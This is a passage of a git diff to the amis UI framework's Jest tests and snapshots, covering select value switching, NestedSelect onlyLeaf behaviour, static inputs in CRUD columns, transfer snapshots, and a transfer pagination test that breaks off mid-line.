let options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[0]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(0); + + /** 从 0 -> false 查询成功 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[3]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(false); + + /** 从 false -> '' 查询成功 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[4]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(''); + + /** 从 '' -> 0 查询成功 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[0]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(0); + + /** 切换到1 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[1]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(1); + + /** 从 1 -> true 查询成功 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[2]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(true); + + /** 从 true -> '1' 查询成功 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[6]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual('1'); + + /** 切换到false */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[3]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual(false); + + /** 从 false -> '0' 查询成功 */ + fireEvent.click(select); + await wait(200); + options = container.querySelectorAll('.cxd-Select-option-content'); + fireEvent.click(options[5]); + await wait(200); + fireEvent.click(submitBtn); + await wait(200); + expect(keyword).toEqual('0'); +}, 7000); diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/static.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/static.test.tsx.snap index 59305c440..a67237dc5 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/static.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/static.test.tsx.snap @@ -119,7 +119,7 @@ exports[`Renderer:static 1`] = ` </div> `; -exports[`Renderer:static 2`] = ` +exports[`Renderer:static2 1`] = ` <div> <div class="cxd-Panel cxd-Panel--default cxd-Panel--form" diff --git a/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap b/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap index 84cec19c7..820b37519 100644 --- a/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap +++ b/packages/amis/__tests__/renderers/Form/__snapshots__/transfer.test.tsx.snap @@ -4022,1396 +4022,6 @@ exports[`Renderer:transfer table 1`] = ` </div> `; -exports[`Renderer:transfer table mode with virtual: result not virtual 1`] = ` -<div> - <div - class="cxd-Panel cxd-Panel--default cxd-Panel--form" - > - <div - class="cxd-Panel-heading" - > - <h3 - class="cxd-Panel-title" - > - <span - class="cxd-TplField" - > - <span> - 表单 - </span> - </span> - </h3> - </div> - <div - class="cxd-Panel-body" - > - <form - class="cxd-Form cxd-Form--normal" - novalidate="" - > - <input - style="display: none;" - type="submit" - /> - <div - class="cxd-Form-item cxd-Form-item--normal" - data-role="form-item" - > - <label - class="cxd-Form-label" - > - <span> - <span - class="cxd-TplField" - > - <span> - 分组 - </span> - </span> - </span> - </label> - <div - class="cxd-TransferControl cxd-Form-control" - > - <div - class="cxd-Transfer" - > - <div - class="cxd-Transfer-select" - > - <div - class="cxd-Transfer-title cxd-Transfer-title--light" - > - <span> - 可选项 - <span> - ( - 190 - / - 200 - ) - </span> - </span> - </div> - <div - class="cxd-TableSelection cxd-Transfer-selection" - > - <div - class="cxd-Table-content is-virtual" - > - <table - class="cxd-Table-table" - > - <thead> - <tr> - <th - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--sm" - data-role="checkbox" - > - <input - checked="" - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </th> - <th> - 名称 - </th> - <th> - 值 - </th> - </tr> - </thead> - </table> - <div - class="cxd-Table-content-virtual" - > - <div - style="display: block; position: relative; width: 100%; height: 100%;" - > - <div - style="overflow: auto; will-change: transform; height: 0px; width: 100%;" - > - <table - class="cxd-Table-table" - style="margin-top: 0px;" - > - <colgroup> - <col - style="width: 0px;" - /> - <col - style="width: 0px;" - /> - <col - style="width: 0px;" - /> - </colgroup> - <tbody> - <tr - class="is-active" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - checked="" - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-1 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 1 - </span> - </td> - </tr> - <tr - class="" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-2 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 2 - </span> - </td> - </tr> - <tr - class="is-active" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - checked="" - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-3 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 3 - </span> - </td> - </tr> - <tr - class="" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-4 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 4 - </span> - </td> - </tr> - <tr - class="is-active" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - checked="" - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-5 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 5 - </span> - </td> - </tr> - <tr - class="" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-6 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 6 - </span> - </td> - </tr> - <tr - class="is-active" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - checked="" - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-7 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 7 - </span> - </td> - </tr> - <tr - class="" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-8 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 8 - </span> - </td> - </tr> - <tr - class="is-active" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - checked="" - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-9 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 9 - </span> - </td> - </tr> - <tr - class="" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-10 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 10 - </span> - </td> - </tr> - <tr - class="is-active" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - checked="" - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-11 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 11 - </span> - </td> - </tr> - </tbody> - </table> - <div - style="position: absolute; width: 1px; white-space: nowrap; min-height: 100%; height: 6400px; top: 0px; visibility: hidden;" - /> - </div> - <div - class="resize-sensor" - style="position: absolute; left: 0px; top: 0px; right: 0px; bottom: 0px; overflow: scroll; z-index: -1; visibility: hidden;" - > - - - <div - class="resize-sensor-expand" - style="position: absolute; left: 0; top: 0; right: 0; bottom: 0; overflow: scroll; z-index: -1; visibility: hidden;" - > - - - <div - style="position: absolute; left: 0px; top: 0px; width: 10px; height: 10px;" - /> - - - </div> - - - <div - class="resize-sensor-shrink" - style="position: absolute; left: 0; top: 0; right: 0; bottom: 0; overflow: scroll; z-index: -1; visibility: hidden;" - > - - - <div - style="position: absolute; left: 0; top: 0; width: 200%; height: 200%" - /> - - - </div> - - - <div - class="resize-sensor-appear" - style="position: absolute; left: 0; top: 0; right: 0; bottom: 0; overflow: scroll; z-index: -1; visibility: hidden;animation-name: apearSensor; animation-duration: 0.2s;" - /> - </div> - </div> - </div> - </div> - </div> - </div> - <div - class="cxd-Transfer-mid" - /> - <div - class="cxd-Transfer-result" - > - <div - class="cxd-Transfer-title cxd-Transfer-title--light" - > - <span> - 已选项 - <span> - ( - 10 - ) - </span> - </span> - <a - class="cxd-Transfer-clearAll" - > - 清空 - </a> - </div> - <div - class="cxd-Selections cxd-Transfer-value" - > - <div - class="cxd-Selections-items" - > - <div - class="cxd-Selections-item" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-1" - > - label-1 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="0" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-3" - > - label-3 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="1" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-5" - > - label-5 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="2" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-7" - > - label-7 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="3" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-9" - > - label-9 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="4" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-11" - > - label-11 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="5" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-13" - > - label-13 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="6" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-15" - > - label-15 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="7" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-17" - > - label-17 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="8" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-19" - > - label-19 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="9" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - </div> - </div> - </div> - </div> - </div> - </div> - </form> - </div> - <div - class="cxd-Panel-footerWrap" - > - <div - class="cxd-Panel-btnToolbar cxd-Panel-footer" - > - <button - class="cxd-Button cxd-Button--primary cxd-Button--size-default" - type="submit" - > - <span> - 提交 - </span> - </button> - </div> - </div> - </div> -</div> -`; - -exports[`Renderer:transfer table mode with virtual: result virtual 1`] = ` -<div> - <div - class="cxd-Panel cxd-Panel--default cxd-Panel--form" - > - <div - class="cxd-Panel-heading" - > - <h3 - class="cxd-Panel-title" - > - <span - class="cxd-TplField" - > - <span> - 表单 - </span> - </span> - </h3> - </div> - <div - class="cxd-Panel-body" - > - <form - class="cxd-Form cxd-Form--normal" - novalidate="" - > - <input - style="display: none;" - type="submit" - /> - <div - class="cxd-Form-item cxd-Form-item--normal" - data-role="form-item" - > - <label - class="cxd-Form-label" - > - <span> - <span - class="cxd-TplField" - > - <span> - 分组 - </span> - </span> - </span> - </label> - <div - class="cxd-TransferControl cxd-Form-control" - > - <div - class="cxd-Transfer" - > - <div - class="cxd-Transfer-select" - > - <div - class="cxd-Transfer-title cxd-Transfer-title--light" - > - <span> - 可选项 - <span> - ( - 189 - / - 200 - ) - </span> - </span> - </div> - <div - class="cxd-TableSelection cxd-Transfer-selection" - > - <div - class="cxd-Table-content is-virtual" - > - <table - class="cxd-Table-table" - > - <thead> - <tr> - <th - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--sm" - data-role="checkbox" - > - <input - checked="" - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </th> - <th> - 名称 - </th> - <th> - 值 - </th> - </tr> - </thead> - </table> - <div - class="cxd-Table-content-virtual" - > - <div - style="display: block; position: relative; width: 100%; height: 100%;" - > - <div - style="overflow: auto; will-change: transform; height: 0px; width: 100%;" - > - <table - class="cxd-Table-table" - style="margin-top: 0px;" - > - <colgroup> - <col - style="width: 0px;" - /> - <col - style="width: 0px;" - /> - <col - style="width: 0px;" - /> - </colgroup> - <tbody> - <tr - class="is-active" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - checked="" - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-1 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 1 - </span> - </td> - </tr> - <tr - class="is-active" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-2 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 2 - </span> - </td> - </tr> - <tr - class="is-active" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - checked="" - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-3 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 3 - </span> - </td> - </tr> - <tr - class="" - style="height: 32px;" - > - <td - class="cxd-Table-checkCell" - > - <label - class="cxd-Checkbox cxd-Checkbox--checkbox cxd-Checkbox--full cxd-Checkbox--sm" - data-role="checkbox" - > - <input - type="checkbox" - /> - <i /> - <span - class="" - /> - </label> - </td> - <td> - <span - class="cxd-PlainField" - > - label-4 - </span> - </td> - <td> - <span - class="cxd-PlainField" - > - 4 - </span> - </td> - </tr> - </tbody> - </table> - <div - style="position: absolute; width: 1px; white-space: nowrap; min-height: 100%; height: 6400px; top: 0px; visibility: hidden;" - /> - </div> - <div - class="resize-sensor" - style="position: absolute; left: 0px; top: 0px; right: 0px; bottom: 0px; overflow: scroll; z-index: -1; visibility: hidden;" - > - - - <div - class="resize-sensor-expand" - style="position: absolute; left: 0; top: 0; right: 0; bottom: 0; overflow: scroll; z-index: -1; visibility: hidden;" - > - - - <div - style="position: absolute; left: 0px; top: 0px; width: 10px; height: 10px;" - /> - - - </div> - - - <div - class="resize-sensor-shrink" - style="position: absolute; left: 0; top: 0; right: 0; bottom: 0; overflow: scroll; z-index: -1; visibility: hidden;" - > - - - <div - style="position: absolute; left: 0; top: 0; width: 200%; height: 200%" - /> - - - </div> - - - <div - class="resize-sensor-appear" - style="position: absolute; left: 0; top: 0; right: 0; bottom: 0; overflow: scroll; z-index: -1; visibility: hidden;animation-name: apearSensor; animation-duration: 0.2s;" - /> - </div> - </div> - </div> - </div> - </div> - </div> - <div - class="cxd-Transfer-mid" - /> - <div - class="cxd-Transfer-result" - > - <div - class="cxd-Transfer-title cxd-Transfer-title--light" - > - <span> - 已选项 - <span> - ( - 11 - ) - </span> - </span> - <a - class="cxd-Transfer-clearAll" - > - 清空 - </a> - </div> - <div - class="cxd-Selections cxd-Transfer-value" - > - <div - class="cxd-Selections-items" - > - <div - style="display: block; position: relative; width: 100%; height: 100%;" - > - <div - style="overflow: auto; will-change: transform; height: 0px; width: 100%;" - > - <div - style="position: relative; width: auto; white-space: nowrap; min-height: 100%; height: 352px;" - > - <div - class="cxd-Selections-item" - style="position: absolute; top: 0px; left: 0px; width: 100%; height: 32px;" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-1" - > - label-1 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="0" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - style="position: absolute; top: 32px; left: 0px; width: 100%; height: 32px;" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-3" - > - label-3 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="1" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - style="position: absolute; top: 64px; left: 0px; width: 100%; height: 32px;" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-5" - > - label-5 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="2" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - <div - class="cxd-Selections-item" - style="position: absolute; top: 96px; left: 0px; width: 100%; height: 32px;" - > - <label - class="cxd-Selections-label" - > - <span - class="cxd-Selection-ellipsis-line" - title="label-7" - > - label-7 - </span> - </label> - <a - class="cxd-Selections-delBtn" - data-index="3" - > - <icon-mock - classname="icon icon-close" - icon="close" - /> - </a> - </div> - </div> - </div> - <div - class="resize-sensor" - style="position: absolute; left: 0px; top: 0px; right: 0px; bottom: 0px; overflow: scroll; z-index: -1; visibility: hidden;" - > - - - <div - class="resize-sensor-expand" - style="position: absolute; left: 0; top: 0; right: 0; bottom: 0; overflow: scroll; z-index: -1; visibility: hidden;" - > - - - <div - style="position: absolute; left: 0px; top: 0px; width: 10px; height: 10px;" - /> - - - </div> - - - <div - class="resize-sensor-shrink" - style="position: absolute; left: 0; top: 0; right: 0; bottom: 0; overflow: scroll; z-index: -1; visibility: hidden;" - > - - - <div - style="position: absolute; left: 0; top: 0; width: 200%; height: 200%" - /> - - - </div> - - - <div - class="resize-sensor-appear" - style="position: absolute; left: 0; top: 0; right: 0; bottom: 0; overflow: scroll; z-index: -1; visibility: hidden;animation-name: apearSensor; animation-duration: 0.2s;" - /> - </div> - </div> - </div> - </div> - </div> - </div> - </div> - </div> - </form> - </div> - <div - class="cxd-Panel-footerWrap" - > - <div - class="cxd-Panel-btnToolbar cxd-Panel-footer" - > - <button - class="cxd-Button cxd-Button--primary cxd-Button--size-default" - type="submit" - > - <span> - 提交 - </span> - </button> - </div> - </div> - </div> -</div> -`; - exports[`Renderer:transfer tree 1`] = ` <div> <div diff --git a/packages/amis/__tests__/renderers/Form/nestedSelect.test.tsx b/packages/amis/__tests__/renderers/Form/nestedSelect.test.tsx index 559e3a0aa..791a4e963 100644 --- a/packages/amis/__tests__/renderers/Form/nestedSelect.test.tsx +++ b/packages/amis/__tests__/renderers/Form/nestedSelect.test.tsx @@ -2,12 +2,13 @@ * 组件名称:NestedSelect 级联选择器 * 单测内容: * 01. maxTagLength + * 02. onlyLeaf */ -import {render, cleanup, waitFor} from '@testing-library/react'; +import {render, cleanup, waitFor, fireEvent} from '@testing-library/react'; import '../../../src'; import {render as amisRender} from '../../../src'; -import {makeEnv} from '../../helper'; +import {makeEnv, wait} from '../../helper'; import {clearStoresCache} from '../../../src'; afterEach(() => { @@ -113,3 +114,107 @@ describe('Renderer:NestedSelect', () => { expect(container).toMatchSnapshot(); }); }); + + +describe.only('Renderer:NestedSelect with onlyLeaf', () => { + test('single selection', async () => { + const optionWithNoChild = 'OptionWithNoChild'; + const optionWithChild = 'OptionWithChild'; + const {container, queryByText} = await setupNestedSelect({ + "onlyLeaf": true, + "options": [ + {"label": "选项A", "value": "A"}, + {"label": optionWithNoChild, "value": "B", "children": []}, + { + "label": optionWithChild, + "value": "C", + "children": [ + {"label": "选项c1", "value": "c1"}, + {"label": "选项c2", "value": "c2"} + ] + } + ] + }); + + const trigger = container.querySelector('.cxd-ResultBox'); + expect(trigger).toBeInTheDocument(); + + + fireEvent.click(trigger!); + await wait(200); + + const parentNum = container.querySelectorAll('.cxd-NestedSelect-optionArrowRight')?.length ?? 0; + expect(parentNum).toEqual(1); + + let options = container.querySelectorAll('.cxd-NestedSelect-optionLabel'); + expect(options.length).toEqual(3); + + /** onlyLeaf开启后,children为空数组的选项也可以选择 */ + fireEvent.click(options[1]); + await wait(300); + expect(queryByText(optionWithNoChild)!).toBeInTheDocument(); + + fireEvent.click(trigger!); + await wait(200); + options = container.querySelectorAll('.cxd-NestedSelect-optionLabel'); + fireEvent.click(options[2]); + await wait(300); + fireEvent.click(trigger!); + await wait(200); + expect(queryByText(optionWithNoChild)!).toBeInTheDocument(); + /** onlyLeaf开启后,children非空的选项无法选择 */ + expect(queryByText(optionWithChild)).toBeNull(); + }); + + test('single selection', async () => { + const optionWithNoChild = 'OptionWithNoChild'; + const optionWithChild = 'OptionWithChild'; + const {container, queryByText} = await setupNestedSelect({ + "onlyLeaf": true, + "multiple": true, + "options": [ + {"label": "选项A", "value": "A"}, + {"label": optionWithNoChild, "value": "B", "children": []}, + { + "label": optionWithChild, + "value": "C", + "children": [ + {"label": "选项c1", "value": "c1"}, + {"label": "选项c2", "value": "c2"} + ] + } + ] + }); + + const trigger = container.querySelector('.cxd-ResultBox'); + expect(trigger).toBeInTheDocument(); + + + fireEvent.click(trigger!); + await wait(200); + + const parentNum = container.querySelectorAll('.cxd-NestedSelect-optionArrowRight')?.length ?? 0; + expect(parentNum).toEqual(1); + + let options = container.querySelectorAll('.cxd-NestedSelect-optionLabel'); + expect(options.length).toEqual(3); + + /** onlyLeaf开启后,children为空数组的选项也可以选择 */ + fireEvent.click(options[1]); + await wait(300); + fireEvent.click(trigger!); + await wait(200); + expect(queryByText(optionWithNoChild)!).toBeInTheDocument(); + + fireEvent.click(trigger!); + await wait(200); + options = container.querySelectorAll('.cxd-NestedSelect-optionLabel'); + fireEvent.click(options[2]); + await wait(300); + fireEvent.click(trigger!); + await wait(200); + expect(queryByText(optionWithNoChild)!).toBeInTheDocument(); + /** onlyLeaf开启后,children非空的选项无法选择 */ + expect(queryByText(optionWithChild)).toBeNull(); + }); +}); diff --git a/packages/amis/__tests__/renderers/Form/static.test.tsx b/packages/amis/__tests__/renderers/Form/static.test.tsx index cc8f69022..c1e761c45 100644 --- a/packages/amis/__tests__/renderers/Form/static.test.tsx +++ b/packages/amis/__tests__/renderers/Form/static.test.tsx @@ -66,7 +66,7 @@ test('Renderer:static', async () => { expect(container).toMatchSnapshot(); }); -test('Renderer:static', async () => { +test('Renderer:static2', async () => { const {container} = render( amisRender( { @@ -189,3 +189,39 @@ test('Renderer:staticOn', async () => { const text = getByText('123'); expect(text).toBeInTheDocument(); }); + +test('Renderer:staticInColumn', async () => { + const {container, getByText} = render( + amisRender( + { + type: 'crud', + source: '${items}', + columns: [ + { + type: 'input-text', + name: 'a', + label: 'a', + static: true, + quickEdit: { + type: 'input-text', + mode: 'inline' + } + } + ], + submitText: null, + actions: [] + }, + { + data: { + items: [{a: '1'}] + } + }, + makeEnv() + ) + ); + + await wait(200); + + expect(container.querySelector('input[name="a"]')).toBeInTheDocument(); + expect((container.querySelector('input[name="a"]') as any).value).toBe('1'); +}); diff --git a/packages/amis/__tests__/renderers/Form/transfer.test.tsx b/packages/amis/__tests__/renderers/Form/transfer.test.tsx index ad9b6abfa..2fa5f0ed1 100644 --- a/packages/amis/__tests__/renderers/Form/transfer.test.tsx +++ b/packages/amis/__tests__/renderers/Form/transfer.test.tsx @@ -1392,7 +1392,6 @@ test('Renderer:transfer search highlight', async () => { }); test('Renderer:transfer tree search', async () => { - const onSubmit = jest.fn(); const {container, findByText, getByText} = render( amisRender( @@ -1486,7 +1485,7 @@ test('Renderer:transfer tree search', async () => { }); await(300); - + const libai = getByText('李白'); expect(libai).not.toBeNull(); fireEvent.click(libai); @@ -1501,4 +1500,310 @@ test('Renderer:transfer tree search', async () => { expect(onSubmit.mock.calls[0][0]).toEqual({ transfer: "caocao,libai" }); -}); \ No newline at end of file +}); + +test('Renderer:Transfer with pagination', async () => { + const mockData = [ + { + "label": "Laura Lewis", + "value": "1" + }, + { + "label": "David Gonzalez", + "value": "2" + }, + { + "label": "Christopher Rodriguez", + "value": "3" + }, + { + "label": "Sarah Young", + "value": "4" + }, + { + "label": "James Jones", + "value": "5" + }, + { + "label": "Larry Robinson", + "value": "6" + }, + { + "label": "Christopher Perez", + "value": "7" + }, + { + "label": "Sharon Davis", + "value": "8" + }, + { + "label": "Kenneth Anderson", + "value": "9" + }, + { + "label": "Deborah Lewis", + "value": "10" + }, + { + "label": "Jennifer Lewis", + "value": "11" + }, + { + "label": "Laura Miller", + "value": "12" + }, + { + "label": "Larry Harris", + "value": "13" + }, + { + "label": "Patricia Robinson", + "value": "14" + }, + { + "label": "Mark Davis", + "value": "15" + }, + { + "label": "Jessica Harris", + "value": "16" + }, + { + "label": "Anna Brown", + "value": "17" + }, + { + "label": "Lisa Young", + "value": "18" + }, + { + "label": "Donna Williams", + "value": "19" + }, + { + "label": "Shirley Davis", + "value": "20" + } + ]; + const fetcher = jest.fn().mockImplementation((api) => { + const perPage = 10; /** 锁死10个方便测试 */ + const page = Number(api.query.page || 1); + + return Promise.resolve({ + data: { + status: 0, + msg: 'ok', + data: { + count: mockData.length, + page: page, + items: mockData.concat().splice((page - 1) * perPage, perPage) + } + } + }); + }); + const {container} = render( + amisRender( + { + "type": "form", + "debug": true, + "body": [ + { + "label": "默认", + "type": "transfer", + "name": "transfer", + "joinValues": false, + "extractValue": false, + "source": "/api/mock2/options/transfer?page=${page}&perPage=${perPage}", + "pagination": { + "enable": true, + "layout": ["pager", "perpage", "total"], + "popOverContainerSelector": ".cxd-Panel--form" + }, + "value": [ + {"label": "Laura Lewis", "value": "1", id: 1}, + {"label": "Christopher Rodriguez", "value": "3", id: 3}, + {"label": "Laura Miller", "value": "12", id: 12}, + {"label": "Patricia Robinson", "value": "14", id: 14} + ] + } + ] + }, {}, makeEnv({fetcher}))); + + await wait(500); + expect(container.querySelector('.cxd-Transfer-footer-pagination')).toBeInTheDocument(); + + const checkboxes = container.querySelectorAll('input[type=checkbox]')!; + expect(checkboxes.length).toEqual(11); /** 包括顶部全选 */ + expect((checkboxes[1] as HTMLInputElement)?.checked).toEqual(true); + expect((checkboxes[2] as HTMLInputElement)?.checked).toEqual(false); + expect((checkboxes[3] as HTMLInputElement)?.checked).toEqual(true); + expect((checkboxes[4] as 